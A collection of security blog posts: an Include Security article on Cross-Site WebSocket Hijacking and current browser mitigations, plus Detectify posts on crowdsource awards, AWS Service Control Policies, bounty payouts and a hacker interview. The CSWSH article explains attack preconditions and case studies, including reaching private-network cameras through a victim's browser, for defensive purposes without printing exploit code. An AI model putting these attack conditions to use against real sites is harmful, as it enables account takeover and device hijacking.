❌

Normal view

Received before yesterday

Cross-Site WebSocket Hijacking Exploitation in 2025

Some of my favorite findings discovered during our client assessments at Include Security have exploited Cross-Site Websocket Hijacking (CSWSH) vulnerabilities. However, going back through those past findings, I realize that some of them wouldn’t work today in all browsers. This is due to improvements in baseline security in browsers around cross-origin requests. These improvements include Third Party Cookie Restrictions/Total Cookie Protection, and Private Network Access. CSWSH is a somewhat incidental casualty of these features, therefore I’ve not been able to find much discussion about the increasing limitations on CSWSH – apart from a passing mention in this excellent primer.

This blog post explores the current state of browser mitigations that make CSWSH harder to exploit. These will be explored together with three case studies of past findings, investigating which of the attacks still work today.

CSWSH Recap

A quick recap on CSWSH. It’s a vulnerability that arises because WebSockets are not protected by the most important browser security mechanism, the Same Origin Policy (SOP). The lack of SOP protection by default enables malicious websites to open WebSocket connections to targeted websites running WebSocket servers. A typical example: a user browses to attacker.com, client-side code running on attacker.com opens a WebSocket connection to bank.com, and the browser helpfully attaches the user’s cookies authenticating to bank.com. Now attacker.com can send arbitrary WebSocket messages to bank.com while masquerading as the user.

The impact is similar to a Cross-Site Request Forgery (CSRF) attack, but more powerful since it’s two-way: the malicious site can also read the responses to malicious requests. Normally a CSRF attack can’t read the server’s responses – unless the targeted server supports Cross-Origin Resource Sharing (CORS) requests, allows included credentials, and is misconfigured to reflect an attacker-controlled origin in the Access-Control-Allow-Origin response header.

CSWSH Mitigation

The definitive way to mitigate CSWSH is that the WebSocket server should first check the Origin of the WebSocket handshake request. If the request does not come from a trusted and expected Origin, then the WebSocket handshake should fail. β€œMissing Origin Validation in WebSockets” has its own Common Weakness Enumeration CWE-1385.

CSRF attacks are often addressed by attaching a pseudo-random CSRF token in the request HTTP header. The server can compare the header value to a CSRF token stored in a cookie (double submit cookie pattern). But this is harder to achieve with WebSocket handshakes due to an oddity with the WebSocket protocol that means you can’t set arbitrary headers. There are some workarounds such as putting a token in the Sec-WebSocket-Protocol header or authenticating in the first WebSocket message.

CSWSH Prerequisites

There are a number of prerequisites for a CSWSH attack to work:
1) The app uses cookie-based authentication
2) The authentication cookie is set to SameSite=None
3) The WebSocket server does not validate the Origin of the Websocket handshake request (and does not use another means to validate the source of requests, such as authenticating in the first WebSocket message).

This seems like a lot of things that have to line up, but CSWSH has been more common than I expected. If I had to speculate:
1) Cookies are still fairly popular compared to token auth.
2) Authentication services often operate across different origins forcing session cookies to use SameSite=None and to rely on CSRF tokens as the main mechanism to defeat CSRF, which aren’t applied to WebSocket handshakes.
3) The ws library for Nodejs and for other common webapp frameworks don’t enforce validating the Origin.

Mitigations

Now let’s discuss current browser security measures and how these make CSWSH attacks harder to achieve than they used to be. We’ll cover three different existing mitigations that can prevent CSWSH attacks, with a brief case study following each one describing how the mitigation affected the exploitability of CSWSH.

SameSite=Lax by default

SameSite=Lax by default is a longstanding and effective browser default that affects CSWSH attacks. If a SameSite setting is not explicitly configured on a cookie, then Chrome has configured it SameSite=Lax by default since 2020. SameSite=Lax means that browsers will send cookies in cross-site requests only for GET requests that resulted from a top-level navigation by the user, like clicking a link.

This has done a lot to make CSRF and CSWSH attacks harder to pull off by default. Note that not all browsers set SameSite=Lax by default. Firefox tried but too many sites broke, and so Firefox relies more on Total Cookie Protection described below instead. Safari also doesn’t use SameSite=Lax by default, but similarly to Firefox, also blocks third-party cookies. Β Microsoft Edge, being based on Chromium, follows the same behavior as Chrome.

Due to breakage of SSO logins during rollout, back in 2020 Chrome rolled out a temporary measure making default SameSite=Lax work slightly differently to a cookie that has explicitly been set to SameSite=Lax by the backend application. For implicit SameSite=Lax, there is a two minute grace period after the cookie is issued where cookies are still sent with top-level cross-site POST requests. As described by PortSwigger, there’s scenarios where this enables a bypass of the SameSite protection. I verified that this two minute grace period still exists, in both Chrome and Firefox. However, it does not apply to CSWSH attacks, since WebSocket handshakes are not top-level POST requests. Therefore SameSite needs to explicitly be set to None for CSWSH attacks to work, no other value for SameSite will allow CSWSH to operate.

Case Study A

This was a 2021 engagement I did against a website that implemented a WebSocket API for making changes to a document. Session cookies did not set a SameSite attribute. At the time, this enabled a CSWSH attack in Firefox, but not in Chrome, due to SameSite=Lax by default. An attacker could use CSWSH to make arbitrary modifications to users’ documents.Β The attack worked when we found it, but today the attack would no longer work in Firefox either due to Total Cookie Protection.

So what is Total Cookie Protection?

Over the past several years Firefox has been locking down their β€œEnhanced Tracking Protection” feature. It’s unclear exactly when, but sometime in 2022-2024 β€œTotal Cookie Protection” was enabled by default for the whole userbase, and this is really effective at blocking CSWSH.

Total Cookie Protection works by isolating cookies to the site in which they are created. Essentially each site has its own cookie storage partition to prevent third parties linking a user’s browsing history together. This is designed to prevent a tracker.com script loaded on site A to set a cookie which can be read by a tracker.com script loaded on site B.

It also has the side-effect of stopping cookie-based CSWSH. A malicious site cannot perform a successful cross-site WebSocket handshake with a user’s cookie, since that cookie is outside the current cookie storage partition. This applies even if the cookie is configured as SameSite=None.

Total Cookie Protection can be disabled in Firefox’s Browser Privacy settings, by selecting the β€œCustom” mode for β€œEnhanced Tracking Protection”, then unchecking the Cookies setting or changing to the old default β€œCross-site tracking cookies”.

Note that Google has been announcing the blocking of third party cookies in Chrome by default for years but have kept delaying for various reasons. The latest target was early 2025, but they changed plans in July 2024. It’s straightforward to configure in the β€œPrivacy and security” settings, though, and this setting is enabled by default within Incognito Mode. Some distributions, notably Chromium on Debian Linux, have the default set to β€œBlock third-party cookies”.

Case Study B

This engagement was against a large web application with a GraphQL API and SameSite=None cookies. Direct CSRF against the GraphQL API wasn’t possible due to the server enforcing the application/json Content-Type, which triggers preflighted requests from the browser. However, the GraphQL API could also be called through a WebSocket. The WebSocket was vulnerable to CSWSH, enabling arbitrary API calls to be made by a third-party attacker, including all account operations such as deleting a user’s account.

This vulnerability would now be unexploitable in default Firefox due to Total Cookie Protection, but is still currently exploitable in default Chrome/Edge.

Private Network Access

We’ve looked at two typical CSWSH scenarios; now for a more unusual one that came up in a client assessment. Let’s start with the case study, since it gives context on a situation where cookies were not used for authentication.

Case Study C

This engagement was against a network device with a camera. A design decision was that users on the same network could access the camera and perform limited configuration without further authentication. Being on the same private network was considered adequate authentication (cookies were not required). A WebSocket API which was vulnerable to CSWSH was added to the device. Now, malicious websites on the Internet could stream video from the devices and configure them, through the medium of a targeted user’s browser who was connected to the private network.

While reviewing this attack against a WebSocket server on a private IP address, I expected it to no longer work in recent versions of Chrome due to Private Network Access (apparently enforced since Chrome 130, I found it wasn’t enforced by default in Chromium 134 on Debian Linux).

The Private Network Access specification acknowledges that an increasing amount of services run on a user’s localhost and their private network, and describes a control similar to CORS to prevent public Internet resources from making unapproved requests to private resources. See for instance this incredible writeup against Tailscale.

Within the Private Network Access specification, IP address spaces are divided into three types: public, private, and local. A request (even a GET request) that is made from a more public to a more private address space triggers a preflight OPTIONS request that has the Access-Control-Request-Private-Network: true header attached by Chrome, and must receive a corresponding Access-Control-Allow-Private-Network: true header in the response for the main request to be sent.

However, I found that CSWSH attacks against private IPs are not affected by Private Network Access. In my testing, attempts to send CSRF attacks against localhost addresses failed in Chrome, but there was no problem with opening WebSockets to more private IPs. On further thought this makes sense, and is called out in the specification, since Private Network Access uses CORS preflight requests as the protection method, and WebSockets do not follow SOP and thus do not use preflight requests.

Testing

To verify all the points made above, I made a small demo app, the source code is at https://github.com/IncludeSecurity/cswsh-demo

A small NodeJS Express server sets a SameSite=None cookie when visiting the / route. The server also exposes a POST / route, and a WebSocket handler, both of which log cookies if they are seen in the request.

The WebSocket server and the demo page were then hosted on separate HTTPS domains, and requests were tried on different browsers to verify if different types of CSRF and CSWSH attacks were successful. The /reflected endpoint was added to elicit the error specific to attempting a CSRF against a private IP with Private Network Access, otherwise a generic CORS error is displayed in DevTools.

Note that inspecting DevTools for WebSockets requests can be misleading – in Chrome, cookies are not always shown in Devtools for WebSocket handshakes! Per a Chromium developer in the linked issue: β€œCookie headers are appended at a lower layer in the networking code, so DevTools doesn’t always have everything. Normal HTTP requests do show cookies in DevTools, including HttpOnly cookies, because they involve a different cookie reporting path that sends the raw headers directly to DevTools.”

Conclusion

So to sum up:

  • SameSite=Lax which is the default for cookies in Chrome is a decent mitigation for CSWSH, so CSWSH requires SameSite=None session/auth cookies.
  • While Firefox doesn’t apply SameSite=Lax by default, Firefox’s Total Cookie Protection appears to be a complete mitigation for CSWSH.
  • The Chrome team has discussed a similar third party blocking technique for years, but still haven’t implemented it and are investigating other approaches. If they did block third party cookies by default, CSWSH would be largely eliminated.
  • Private Network Access in Chrome does not block CSWSH against private networks.

Revisiting the three case studies:

  • A) No SameSite attribute specified on cookie -> no longer works in any major browser.
  • B) Typical CSWSH with SameSite=None cookie -> works in default Chrome but not Firefox.
  • C) CSWSH against private IP -> still works on all browsers even though my initial expectation was that it would no longer work in Chrome.

For defenders, adding an Origin check in the server-side WebSocket handshake handler is still the best way of defending against CSWSH attacks. This is important as while browser mitigations are slowly improving, they cannot be fully relied upon. It is still possible to perform CSWSH under the right circumstances against default Chrome, and it is possible for a user to run a browser that is configured to disable settings such as Total Cookie Protection. Similarly, it is not ideal to rely on the SameSite=Lax attribute on authentication cookies to protect against CSWSH. The cookies could later be changed to use SameSite=None as part of an unrelated code change, causing CSWSH vulnerabilities to become exploitable.

The post Cross-Site WebSocket Hijacking Exploitation in 2025 appeared first on Include Security Research Blog.

2024 Detectify Crowdsource Awards: Meet the Winners

18 February 2025 at 08:36

It’s that time of year again! Here at Detectify, we’re excited to celebrate the talent and dedication of our Crowdsource community members with our annual awards, the β€œNobel Prizes” for ethical hacking (both originating from Sweden!). The Crowdsource awards recognize the top hackers who have helped us make the internet a safer place throughout the last year.Β 

How the 2024 Detectify Crowdsource Awards Work

Our awards are based on several factors that highlight the diverse contributions of our hackers. This year, we’re looking at quality of submissions by considering the validity ratio, the highest number of submissions for high and critical severities, and the most value generated from submissions made in 2024.Β 

Let’s roll out the red carpet:Β 

Perfect Precision Award

This award recognizes the hacker with the highest percentage of valid submissions. With an impressive 65% validity ratio, the winner is Geek Freak! Our internal research team truly admires his consistent accuracy and attention to detail.Β 

Severity Savant Award

While all submissions are crucial to help us protect our customers’ attack surfaces, this particular award honors the hacker who submitted the highest number of valid High and Critical submissions as rated by our internal security research team. Congratulations, once again, to Geek Freak for an outstanding 49 valid High and Critical submissions!Β 

Hit Happens AwardΒ 

This award goes to the hacker whose submission during the year 2024 resulted in the most β€œhits” (unique times one specific vulnerability has been found in customers’ systems). With a remarkable 71 hits, the winner is cswiers! His work has helped a bunch of customers (and many more to come).

Team TrophyΒ 

This special award is voted on by Detectify’s internal security researchers. It recognizes a Crowdsource member who has demonstrated exceptional work, high-quality submissions and great collaboration during 2024. This year, the Team Trophy goes to Joshua!Β 

A Huge Thank You

We want to express our deepest gratitude to every member of our Crowdsource community. Your hard work, dedication, and passion for ethical hacking are what make this program successful. The Detectify Crowdsource Awards are just a small way of showing our appreciation for the role you play in thousands of attack surfaces.Β 

Want to Join the Crowdsource Community?

Inspired by our winners? Learn more about the Detectify Crowdsource program and how you can join our team of ethical hackers.Β 

The post 2024 Detectify Crowdsource Awards: Meet the Winners appeared first on Labs Detectify.

Reducing the attack surface in AWS

26 March 2024 at 11:17

β€œAnything that can go wrong will go wrong” – Murphy’s Law. We want to reduce what can go wrong. The smaller our attack surface, the fewer things we need to worry about. An excellent way of reducing the attack surface (and our cognitive load) is using AWS Service Control Policies (SCPs.) In this post, I’ll describe how we approached it.

What are SCPs?

SCPs are policies to control what can and cannot be done in one or more AWS accounts, regardless of what an IAM policy might say (even if you’re root.) SCPs can be applied to accounts or organizational units (OUs). By default, everything is allowed, and it’s up to us to deny what we don’t need. SCPs are always a defense in depth and will never trigger if IAM permissions are properly configured, but relying on perfect IAM configuration is not a luxury we can afford to count on. For more information about SCPs, see the official AWS documentation on SCPs.Β 

What do we want to allow or deny?

Preferably, we would deny any action we’re not using, but that’s most likely an administrative hell, and we’ll end up blocking developers daily, so we decided against even trying it. At Detectify, we’ve gone for a more pragmatic approach:

  • Only allow AWS services we use (rather than actions)
  • Only allow regions we use
  • Disallow dangerous actions

This has been a good balance between reducing things we need to worry about and keeping developers productive.

Only allow services we use

The easiest way to find which services you use is by generating an Organization activity report (aka. organizations access report.) This report shows when services were last used, if at all.

The report can be generated based on an OU or a specific account. In our case, we started with generating a report for our Production OU. To generate such a report, we can use AWS CLI:

aws iam generate-organizations-access-report \
  --entity-path "o-XXXXXXXXXX/r-XXXX/ou-XXXX-XXXXXXXX"

Where theΒ entity-pathΒ is theΒ AWS Organizations entity pathΒ to our Production OU.

Once the report is generated we can get the list of used services with:

aws iam get-organizations-access-report \
  --job-id "JobId-goes-here" \
  --max-items 1000 \
  --query 'AccessDetails[?TotalAuthenticatedEntities > `0`].[ServiceName,ServiceNamespace,LastAuthenticatedTime]'

This gives a list of all services that have been used in the tracking period. It shows the service name, the IAM namespace, and when it was last accessed.

We manually went through this list and filtered out obvious entries that were most likely just someone browsing a specific service in the AWS web console and very old activity.

With the list of used services, we created a policy that denied anything not on the list:

data "aws_iam_policy_document" "allow_only_used_services" {
  statement {
    sid       = "AllowOnlyUsedServices"
    effect    = "Deny"
    resources = ["*"]

    not_actions = [
      <LIST OF NAMESPACES OF USED SERVICES>
    ]
  }
}

This policy denies access to any service not listed in theΒ not_actions. We seldom adopt new AWS services so this method rarely blocks development but allows us to ensure a proper process for evaluating new services.

Only allow regions we use

We only use a few AWS regions, and there is no reason to allow usage of any region outside of that. At first glance, it might seem obvious how one can use SCP to block unused regions, but because some services are global, you cannot fully restrict access to only certain regions.

As described in Detectify’s journey to an AWS multi-account strategy, we use Control Tower. In Control Tower you can configure which regions to allow or deny, which is what we did.

Disallow known dangerous actions

While only allowing specific actions would be too much work, blocking the risky ones is a lot easier.

Exactly which SCPs to apply depends on the organization but they tend to be far more general than IAM policies, which means they can be shared between organizations. Some places to find SCPs:

There are lots of good resources out there. If you search forΒ aws scp site:github.comΒ you’ll find plenty of examples. We went through many different SCPs for inspiration and picked the (for us) most relevant and least error-prone parts we could find.

Expensive actions

Some actions can be very expensive. We have opted to block the most expensive ones we know of. Ian Mckay has a gist with some expensive actions you might want to block to avoid costly mistakes:

data "aws_iam_policy_document" "deny_costly_actions" {
  statement {
    sid       = "DenyCostlyActions"
    effect    = "Deny"
    resources = ["*"]

    actions = [
      "acm-pca:CreateCertificateAuthority",
      "aws-marketplace:AcceptAgreementApprovalRequest",
      "aws-marketplace:Subscribe",  
      "backup:PutBackupVaultLockConfiguration",
      "bedrock:CreateProvisionedModelThroughput",
      "bedrock:UpdateProvisionedModelThroughput",
      "dynamodb:PurchaseReservedCapacityOfferings",
      "ec2:ModifyReservedInstances",   
      "ec2:PurchaseHostReservation",
      "ec2:PurchaseReservedInstancesOffering",
      "ec2:PurchaseScheduledInstances",
      "elasticache:PurchaseReservedCacheNodesOffering",
      "es:PurchaseReservedElasticsearchInstanceOffering",
      "es:PurchaseReservedInstanceOffering",
      "glacier:CompleteVaultLock",
      "glacier:InitiateVaultLock",
      "outposts:CreateOutpost",
      "rds:PurchaseReservedDBInstancesOffering",
      "redshift:PurchaseReservedNodeOffering",
      "route53domains:RegisterDomain",
      "route53domains:RenewDomain",
      "route53domains:TransferDomain",
      "s3-object-lambda:PutObjectLegalHold",
      "s3-object-lambda:PutObjectRetention",
      "s3:BypassGovernanceRetention",
      "s3:PutBucketObjectLockConfiguration",
      "s3:PutObjectLegalHold",    
      "s3:PutObjectRetention",    
      "savingsplans:CreateSavingsPlan",
      "shield:CreateSubscription",
      "snowball:CreateCluster",
    ]
  }
}

Some of these actions you might want to be careful with. For example, denyingΒ route53domains:RenewDomainΒ could cause problems if it’s applied to the OU or account that manages domains.

SCPs via Control Tower controls

If you are, like us, using Control Tower there are a few dozen SCPs you can enable and let Control Tower manage. In Control Tower you can filter the view to only show SCPs:

Some of the listed SCPs are enabled by default, but plenty of opt-ins exist.

SCP size limits and workarounds

SCPs can be a maximum 5120 bytes, including white-space. We ran into this issue because aws_iam_policy_document does not generate minimized JSON by default.

There are a few ways to work around this:

  • Use multiple policies (max 5 per OU)
  • Apply the policy to a parent OU (if you’ve reached the max 5 limit per OU)
  • Minimize the JSON

We went with the last option. There is no built-in function to minimize JSON in Terraform, but you can minimize it by running jsonencode(jsondecode()), so something like:

resource "aws_organizations_policy" "example" {
  name    = "example"
  type    = "SERVICE_CONTROL_POLICY"
  content = jsonencode(jsondecode(data.aws_iam_policy_document.example.json))
}

This allows us to have our policies written in Terraform (which is more readable, allows comments, gives linting, etc) and still minimize the number of bytes used. If you browse the SCP via AWS console, it won’t be minimized so it’s still readable there too.

Testing SCPs before production

There is no dry-run for SCPs which makes any change to them a bit scary since you cannot know if something will break or not.

To reduce the risk of us breaking anything important, we first apply our SCPs to our Staging OU. By having the SCPs applied in staging for a while one can see if it passes the scream test. One can also query CloudTrail via Athena to see if there are any relevant SCP errors with for example:

SELECT * FROM cloudtrail_logs WHERE errorcode='AccessDenied' AND errormessage LIKE '%service control%';

So far we’ve been lucky enough to never encounter any issues and the SCPs have since long been applied to production successfully!

Conclusion

SCPs allowed us to vastly reduce our attack surface and improve our defense in depth. Even though there is no dry run everything went smoothly and we now have much fewer things to keep in mind and worry about!

The post Reducing the attack surface in AWS appeared first on Labs Detectify.

2023 Detectify Crowdsource Awards: Meet the winners

6 February 2024 at 19:40

We at Detectify are thrilled to present the 2023 Detectify Crowdsource Awards, akin to the Oscars or Grammys of ethical hacking. The awards are our opportunity to celebrate our Crowdsource community members’ extraordinary talents and achievements from the past year. The ethical hackers awarded in this edition have shown exceptional skill and played a crucial role in fortifying the security of Detectify’s customers throughout a year full of threats.Β 

Let’s roll out the red carpet and meet our distinguished winners:

Leaderboard Leader

Firzen set the bar high in 2023, amassing a staggering 51,500 points and securing the top spot on our leaderboard.

Β 

Substantial Submitter

Geek Freak demonstrated that quantity and quality can indeed go hand in hand. He exemplified consistency and impact in 2023, with an impressive tally of over 65 valid submissions throughout the year.Β 

Β 

Superiority Submitter

The title of Superiority Submitter goes to Tengeez in 2023. With an outstanding submission validity ratio of 71%, his work exemplified quality and set the benchmark for ethical hackers in our community.

Β 

Serial Submitter

Once again, Geek Freak made his mark by clinching the Serial Submitter award. His dedication to submitting at least one valid finding every month throughout 2023 shows a level of consistency and commitment that is rare and commendable.

Β 

Critical Submitter

In the realm of high-stakes vulnerabilities, Shaikhyaser has emerged victorious in 2023, securing the new Critical Submitter award. With over two-thirds of his submissions being high or critical-severity vulnerabilities, his contributions have been pivotal in enhancing the security landscape of Detectify customers.Β 

Lastly, we’d like to thank the whole community. All members of Detectify Crowdsource deserve a big round of applause for their valuable contributions in 2023 and to making the internet safer.Β 

Join Crowdsource

Inspired by the accolades of our ethical hackers? We invite you to become part of this community. Apply to make the internet safer with us at Detectify Crowdsource and join a journey of discovery, challenge, and impact.

The post 2023 Detectify Crowdsource Awards: Meet the winners appeared first on Labs Detectify.

Enhancing the Detectify Crowdsource reward system with more continuous and lucrative payouts

23 October 2023 at 22:17

Starting November 1, 2023, the reward for each time a submitted module is found in customers’ assets (pay-per-hit) will be doubled for critical, high, and medium severity modules, while fixed payouts will be phased out.

Detectify Crowdsource was launched in 2018 to democratize security research coming from ethical hackers, commonly bound to bug bounty programs that yielded one-time rewards. Our unique approach pioneered the automation of crowdsourced security research, and we’ve created a profitable reward system where submitters are paid for the impact of their vulnerabilities in our customer’s assets.

Since launching our program, we have issued over USD 500,000 in rewards to our private community of ethical hackers.Β 

On accepted submissions, Crowdsource community members would previously receive a fixed payout, determined by the severity of the vulnerability submitted, and a payout every time that one vulnerability was found in our customers’ systems (pay-per-hit).

From November 1, 2023, fixed payouts will be phased out and replaced by substantial enhancements to the pay-per-hit.

Maximizing benefits for both ethical hackers and customersΒ 

We’re introducing an update to promote higher-quality modules, quicker implementation, and to ensure fair and continuous rewards for our ethical hackers:

  • Pay-per-hit is our most distinctive attribute. It allows hackers to receive a passive income for each unique hit produced in the Detectify customer base. We’re now taking pay-per-hit to new heights by amplifying rewards that maximize passive income opportunities.
  • We’re incentivizing submissions that can effectively safeguard our customers’ assets/technologies and will enable our team to streamline module triage and building. We anticipate this will mean faster processing times for submitted modules.Β 

The new reward system

  • We are substantially increasing the pay-per-hit:Β 
    • x2 the current amount paid per hit for critical, high, and medium severity submissions.
      (Now, USD 200, USD 100, and USD 40, respectively)Β 
  • We’re phasing out fixed payouts for all submissions.Β Β 
  • We’re boosting the 0-day bonus:
    • x3 the current amount for critical severity 0-day bonus.
      (Now, USD 300)Β 
    • x2 the current amount for high severity 0-day bonus.
      (Now, USD 200)

For example, with the new reward system, if you submit a critical severity module that obtains 100 unique hits, you will receive 20,000 USD (100 payouts of 200 USD).Β 

Combining human ingenuity and automation

Detectify Crowdsource consists of 400+ world-class ethical hackers that have generated over 250 million vulnerability findings across the attack surfaces of our 2000+ customers. This monumental achievement from our community is fueled by their submissions, knowledge, and dedication to making the Internet a safer place. No wonder we are proud of them!Β 

Interested in joining our community?

Wondering how you can join our community of leading ethical hackers? Try out our signup challenge to see if you have the experience needed to join Detectify Crowdsource here.

Q&A

Will I get the new reward for modules submitted before November 1?

The new payouts will only apply to those modules submitted from November 1, 2023.

How can I make sure I’m spending time researching technologies that will generate hits?

In the Detectify CS platform, you can access the list of technologies and versions that have been fingerprinted in Detectify’s customers’ assets in the last 3 months. We’ve identified these technologies as being used by our customers to build their products. You can use this list as inspiration for what types of technologies are most commonly used by Detectify’s customers and make the submission more successful.

What is a payout/pay-per-hit?

Every time your submitted vulnerabilities are found in a unique customer application through the Detectify service, you will receive a payout-per-hit. The amount varies depending on the severity of your module.

What is a point per hit?

Along with the payout-per-hit, you also receive points each time your submitted vulnerability is found in a unique customer asset. These points can help you climb our leaderboard. We offer awards for the users at the top of our leaderboard.

What is a 0-day bonus?

If you submit a critical or high severity 0-day vulnerability, you will receive a 0-day bonus, along with regular payouts for the module. You will receive the 0-day bonus once the module has gone live. Remember to mark your submission as a 0-day in the submission form, and then we will validate the vulnerability and start the 0-day process.

Here is an example:

  • You submit a critical severity 0-day vulnerability.
  • Once the module goes live, you receive the critical 0-day bonus payout of $300.
  • The module gets 10 hits, so you receive a payout per hit of $200 x 10 hits = $2000.
  • In total, for this module, you earned $2300.Β 
  • Plus, as time goes on, you can receive more hits and keep the $$ coming!Β 
  • You also receive points per hit, which equals 5000 points (500 points x 10 hits).

The post Enhancing the Detectify Crowdsource reward system with more continuous and lucrative payouts appeared first on Labs Detectify.

Q&A with a Crowdsource hacker: Sebastian Neef a.k.a. Gehaxelt

21 April 2023 at 08:31

Detectify Crowdsource hacker Sebastian Neef, otherwise known as Gehaxelt, has an inspirational background in ethical hacking. Driven by curiosity, a sense of friendly competition, and an aspiration to do good for others, he has built a successful career as an ethical hacker and cybersecurity expert.Β 

In our recent Detectify Crowdsource Awards, Gehaxelt was the winner of the Fabulous Feedbacker award, which acknowledged his constant willingness to help, great attitude, and proactive activity in our internal channels.

Read on as Gehaxelt shares how he started out on his career path, some of his current go-to resources and tools, and valuable pieces of advice for fellow ethical hackers who are looking to further their skills.

Detectify: How did you first become interested in ethical hacking, and what inspired you to pursue it as a career?

Gehaxelt: When I was eight years old, I got my first computer. Back then, I was just playing around with lame, 2D computer games. It wasn’t until I was 14 that my father showed me how to build simple websites using plain HTML and CSS. I was thrilled and became motivated to learn more about this. At some point, it slowly evolved into writing automation bots for the games I was playing. One might not consider this to be hacking, but it helped me begin to think outside the box.

While finishing high school two years later, the infamous hacks by Anonymous were all over the mainstream media. It was at that time that I asked myself, β€œIs hacking (websites) really that easy, or are these hackers just really skilled?” To find out, I began to investigate and spent many evenings browsing the internet learning about web security and various hacking techniques.Β 

And it turned out that hacking can be really easy if you know a few tricks. At least back then (around 2010 or so), many web frameworks, web developers, and sysadmins weren’t as security-aware as they are today, so classic vulnerabilities like SQL Injection, cross-site scripting (XSS), and others were effortlessly found.

I first came across responsible disclosure and bug bounty programs sometime around 2011/2012, which presented a great opportunity for me: Legally being able to test my skills and knowledge against real-world targets and not just some simulated hacking challenges. Certainly enough, I began to find issues that were worth reporting and placed me in a few halls of fame (including those of Google, PayPal, and Twitter). That was a great feeling and a few programs handed out swag or money in return, which was a nice motivational boost. Especially as a soon-to-be student, it was great to earn some extra money doing what I enjoyed.Β 

When I was hacking during those years, I often imagined a β€œchallenge” between the website’s developers and myself β€” in other words, can they write code that I won’t be able to hack? Can I be better than them? Many times, the answer to these questions was yes, and the resulting rush of adrenaline did the rest. πŸ˜‰

β€œResponsible disclosure and bug bounty programs presented a great opportunity for me: Legally being able to test my skills and knowledge against real-world targets.”

However, doing it alone can be boring at times. Luckily enough, bug bounty communities were beginning to form on Twitter and various online chat groups, so using those channels, I began to exchange writeups, techniques, and ideas with others. Although it was tough competition, it had a positive feedback loop, and collaborating was fun, too.Β 

In the end, we were helping companies to make their websites more secure and thus protect customer data from being stolen.Β 

Detectify: What steps do you take to ensure that your work as an ethical hacker is both legal and ethical?

Gehaxelt: Unfortunately, not all websites that I frequented had a responsible disclosure or bug bounty program, so in 2012, I founded the project internetwache.org. The main idea behind the project was to see how less security-aware companies or website administrators would react to my vulnerability notifications. Plus, as I often used the service myself, I wanted to have my data secured from bad actors.

Since Germany has β€œhacking laws” prohibiting security testing without authorization β€” and I assumed that just sending out emails from β€œ[email protected]” would quickly land me in jail β€” I needed to be more clear about my intentions. Thus, the project’s domain and website were intended to convey my good, ethical intentions. The site was set up to explain who I am in detail and the fact that with my testing, I’m simply trying to help companies improve their security posture: I test solely for vulnerability symptoms, not exploiting anything or pivoting into things I shouldn’t see.

From a legal perspective, the intent might not have changed anything in front of the court, but I was still a teenager and a bit naive, so I believed that nobody would sue someone trying to help them. But to reiterate: I never tried to exploit a vulnerability; instead, I just looked for the symptoms (i.e. an SQL error message/page behavior when changing parameters, broken HTML when entering some tags, etc.). Also, I ensured that the emails I sent always had a friendly tone and never asked for anything in return.Β 

This appeared to have worked: The majority of people that I contacted responded in a friendly manner, thanked me for pointing out the vulnerability, and sometimes even offered a token of appreciation. The worst experiences that I had were either being ignored or being told to not bother the recipient with such things.

Coming back to the initial question, though, I believe that it’s important to know the boundaries. Over the recent years, we’ve heard a few stories of security researchers going too far and getting in trouble. If one respects the scope of a program, tries not to break things when performing their tests, and doesn’t attempt to extort anything (a.k.a. β€œbounty plz”), chances are good that it will be a win-win situation.Β 

But of course, my story could totally be survivor-biased and might not work out well for others, so take it with a grain of salt.

β€œIf one respects the scope of a program and tries not to break things when performing their tests, chances are good that it will be a win-win situation.”

In the end, it all boils down to trust. Can you be trusted not to overstep visible (or invisible) boundaries? Can you effectively communicate your good faith effort?

In all cases, it certainly helps to be aware of the rules of a responsible disclosure and bug bounty program and follow them thoroughly. If you’re unsure, ask first.

Detectify: How do you stay up-to-date with the latest hacking techniques and technologies? What are some of your go-to research resources?

Gehaxelt: Back in the day, Twitter was a really great resource for this once you followed the right people who frequently shared their findings and techniques. However, I feel like this has changed over time – I now see fewer write-ups on blogs, but on the other hand, there are many publicized bug bounty reports that you can read, understand, and learn something from. There are also other sources of knowledge, like YouTube or podcasts, but in the end, nothing beats hands-on experience.

Personally, I really enjoy reading HackerNews to get a community-curated feed of technical news related to IT security. In terms of keeping my skills and knowledge up-to-date, my go-tos are capture the flag (CTF) competitions. Solving security riddles with a team of like-minded people has been β€” and still is β€” an invaluable learning resource for me. Well organized CTFs usually feature the latest vulnerabilities and hacking techniques, so you won’t be able to avoid them if you want to come in first place.Β 

Talking to other people, collaborating, and attending conferencesΒ  obviously also helps in staying up to date. Last but not least, as a Ph.D. candidate, I closely follow academic research, which can sometimes be applicable to bug bounties as well.

Detectify: What do you consider to be the biggest ethical challenges facing today’s ethical hackers and how do you address them in your work?

Gehaxelt: In regards to responsible disclosure and bug bounty programs, the steep competition is a big challenge. It can become quite demotivating if you’re unable to find vulnerabilities or only come across dupes β€” and this happens more often these days, since modern websites are more secure than they were 10 years ago.Β 

It might be tempting to go out-of-scope and hack on endpoints that others haven’t yet looked at, but in doing so, you’ll void the Safe Harbor Agreement (SHA) that most bug bounty platforms have. You can avoid that if you stay inside the scope and keep true to a program’s rules. Ask the program owners if something is unclear.

Detectify: What are your favorite parts about working with Detectify Crowdsource?

Gehaxelt: Talking about abiding to the scope, Detectify can be a big help in this regard. Once a submitted module is validated and accepted, it will only be run against Detectify customer’s assets and endpoints, which Detectify is authorized to do. This saves Crowdsource hackers time hacking on other bug bounty targets β€” while Detectify runs your modules on other customer’s assets, you’ll have a greater reach running your vulnerabilities against targets you might not otherwise have access to. It’s also great if you don’t have the time to do hours-long or all-night bug bounty hunts. You’ll receive a monetary reward every time your module produces a hit.

In a nutshell, what I like about Detectify’s Crowdsource system is that they do the work and I can do the research β€” it’s a win/win for everyone. πŸ™‚

Get involved with Detectify Crowdsource

Detectify Crowdsource embraces the talents of ethical hackers like Gehaxelt. If this work aligns with your interests, we encourage you to learn more about the opportunities made possible by joining Crowdsource.

Additionally, you can keep up with our team’s activities to stay looped in on our Crowdsource hackers’ latest and most significant research.

The post Q&A with a Crowdsource hacker: Sebastian Neef a.k.a. Gehaxelt appeared first on Labs Detectify.

2022 Detectify Crowdsource Awards: Meet the winners

22 February 2023 at 08:48

Early each year, Detectify honors the top-performing ethical hackers within our Crowdsource community. To do so, we’ve put together our own β€œOscars for hackers” – the Detectify Crowdsource Awards!

How the Detectify Crowdsource Awards work

The latest awards reflect our hackers’ achievements made during 2022. Our selection of awards, which we’ll take an in-depth look at below, are measured by a variety of factors: Some awards are based on whether the winner has up to a certain number of points, while others take the number and quality of submissions that the researcher has submitted into account.

We also have an award for individuals who have been exceptionally great to work with by using effective communication, being especially helpful, or consistently having a good attitude.

When it comes to the points mentioned above, here’s how they work:

